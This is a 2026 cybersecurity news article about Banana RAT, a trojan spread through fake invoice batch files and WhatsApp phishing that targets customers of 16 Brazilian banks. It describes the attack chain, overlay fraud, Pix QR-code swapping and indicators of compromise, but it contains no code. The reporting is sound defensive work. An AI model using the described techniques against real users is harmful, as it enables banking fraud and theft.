Banana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks

Summary

Banana RAT, a remote access trojan linked to threat group SHADOW-WATER-063, is actively targeting customers at 16 Brazilian banks including Itaú, Bradesco, and Santander. The malware is distributed through fake invoice files and security update screens via WhatsApp and phishing, using fileless execution and a custom FastAPI crypter to evade detection. It enables real-time financial fraud by intercepting banking sessions, replacing Pix QR codes, and freezing user input while attackers steal funds.

Full text

Security Malware Scams and FraudBanana RAT Malware in Fake Invoices Hits Customers at 16 Brazilian Banks Banana RAT malware hidden in fake invoices and security update screens targets customers at 16 Brazilian banks stealing data with QR fraud. byDeeba AhmedMay 20, 20263 minute read A new threat called Banana RAT malware is targeting banking customers in Brazil, using fake documents and tools to compromise devices and steal funds. Cybersecurity experts from TrendAI (formerly Trend Micro) found the operation and shared its details with Hackread.com. Inside the Attack Pipeline The scam was still active when TrendAI experts began investigating. They collected data directly from the hackers’ live servers between 17 and 22 April 2026 to fully understand how the scam works. They found that the attackers speak Brazilian Portuguese, operate under the temporary name SHADOW-WATER-063, and are targeting individuals in Brazil’s business sector to deliver the Banana RAT malware. The hackers’ own code stamps revealed their internal project codename as Projeto Banana. Further probing revealed that scammers trick victims via WhatsApp or phishing links into downloading a fake electronic invoice file named Consultar_NF-e.bat from the domain convitemundial2026.com. When they click on it, this batch file runs a hidden PowerShell command that fetches a second file called msedge.txt. Now, the scam turns to fileless execution because the main code runs entirely in the computer’s memory and isn’t saved to the disk. And, to avoid detection, the malware copies its files into a fake Microsoft folder path (C:\ProgramData\Microsoft\Diagnosis\ETW). On the hacker-controlled servers, the group uses FastAPI crypter, a custom obfuscation tool, to manage the attack. They don’t need to send the same file to everyone because this server setup automatically scrambles the code to generate 100 to 200 unique malware versions at once, and since each download is completely different, standard antivirus tools cannot recognise or block the file. Stealing Money in Real Time Hackers are basically conducting financial fraud, targeting 16 specific Brazilian banks and crypto exchanges. What makes the Banana RAT operation dangerous is that the malware allows attackers total control by functioning as a live surveillance and theft tool. With features like screen streaming, the hackers can view the victim’s desktop, log keys to steal passwords, and use BlockInput to freeze the victim’s mouse and keyboard. “What makes this case notable is not just the sophistication of the tooling – it is the intent behind it. This is an operation purpose-built to enable real-time financial fraud: intercepting banking sessions, manipulating payment flows, and deceiving victims when they are most vulnerable,” researchers noted in the blog post. When a victim opens their online bank, the malware uses a Display Overlay Module to pop up a fake full-screen message saying “Mandatory Security Update – DO NOT TURN OFF YOUR COMPUTER”. While the user waits, the hacker makes illegal transfers in the background. The malware also has a special feature using the ZXing library to swap Pix QR codes, which is Brazil’s instant-payment system. If a user tries to scan a QR code to pay a bill, the malware changes the data so the money goes straight to the scammers. Banana RAT killchain (Source: TrendAI) The malware targets some of Brazil’s largest retail and corporate financial institutions, including: Itaú Caixa Bradesco Santander Banco do Brasil (BB) It also targets regional banks like Banrisul and Daycoval, and cooperative networks like Sicoob and Sicredi. TrendAI is now working with the Federação Brasileira de Bancos (FEBRABAN) to share intelligence and stop the threat. Until it is dealt with, experts suggest organisations should block network access to the primary command domain, cwindowsk-cdncom to keep systems safe. Sharing his insights with us over this discovery, TrendAI’s VP of AI Security and Threat Research, Tom Kellermann, stated: “The Brazilian cybercrime cartels are very sophisticated and organized, and they have been a bane to the financial sector since 2000. The RATs and rootkits they develop are on par with those we have seen from Russia. Insufficient attention is being paid to cybercrime in LATAM, and the financial sector has good reason to be concerned as something wicked comes this way.” Deeba Ahmed Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage. View Posts Banana RATBrazilCyber CrimeCybersecurityFraudMalwareScam Leave a Reply Cancel reply View Comments (0) Related Posts Read More Security Malware Python Malware in Zebo-0.1.0 and Cometlogger-0.1 Found Stealing User Data Fortinet discovers two malicious Python packages, Zebo-0.1.0 and Cometlogger-0.1, designed to steal data, capture keystrokes, and gain system control. Learn about their malicious behavior and how to protect yourself byDeeba Ahmed Cyber Crime Scams and Fraud YouTube scammers impersonated Elon Musk, SpaceX; stole $150k in BTC Scammers successfully tricked viewers in to sending a small amount of Bitcoin and get double in return. byDeeba Ahmed Read More Cyber Crime Scams and Fraud North Korean Hackers Use Fake Crypto Firms in Job Malware Scam Silent Push reveals a complex scheme where North Korean hackers posed as crypto companies, using AI and fake… byDeeba Ahmed Read More Security Cyber Attacks TellYouThePass Ransomware Exploits Critical PHP Flaw, Patch NOW Urgent alert for PHP users: Update your server immediately to protect against the newly exploited CVE-2024-4577 by TellYouThePass… byWaqas

Indicators of Compromise

• domain — convitemundial2026.com
• malware — Banana RAT
• malware — FastAPI crypter

Entities